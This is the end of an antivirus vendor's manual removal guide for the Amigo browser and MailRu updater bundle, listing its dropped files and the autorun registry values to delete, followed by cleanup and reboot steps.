    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-BR.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\resources.pak (180073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fr.pak (251 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sl.pak (218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-GB.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-PT.pak (232 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_touch_100_percent.pak (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hr.pak (222 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fi.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pl.pak (229 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-TW.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ta.pak (1829 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\npchrome_frame.dll (15801 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fi.pak (220 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_child.dll (286042 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\te.pak (1805 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\am.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\it.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sk.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_frame_helper.exe (85 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\da.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\kn.pak (1815 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\kn.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es.pak (242 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fa.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-US.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\el.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bn.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\id.pak (209 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\th.pak (1745 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ro.pak (242 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ko.pak (239 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\nacl_irt_x86_64.nexe (28502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nb.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\de.pak (234 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es-419.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sr.pak (1636 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\it.pak (229 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\tr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\master_preferences (982 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\libglesv2.dll (6349 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ml.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sv.pak (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\ok.exe (142 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\VisualElementsManifest.xml (391 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1705.153\Installer\setup.exe (7971 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\icudt.dll (72365 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\tr.pak (231 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\te.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sk.pak (241 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bg.pak (1668 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nl.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\he.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sw.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\mr.pak (1748 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-TW.pak (195 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lv.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\vi.pak (263 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\VisualElements\logo.png (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\cs.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\vi.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hi.pak (1754 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\amigo.exe (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\th.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-US.pak (195 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-BR.pak (226 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bg.dll (10 bytes)
    %Documents and Settings%\%current user%\Desktop\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\extensions\external_extensions.json (103 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sl.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\et.pak (207 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ta.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_launcher.exe (180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\de.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\nacl64.exe (12289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es-419.pak (237 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lt.pak (231 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\MailRu\MailRuUpdater.exe (46100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\nacl_irt_x86_32.nexe (42362 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-PT.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ko.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ca.pak (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hu.pak (246 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fil.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\secondarytile.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\ffmpegsumo.dll (9606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-GB.pak (195 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\chrome.7z (1326482 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fil.pak (239 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\metro_driver.dll (1747 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\gu.pak (1745 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome.dll (283704 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now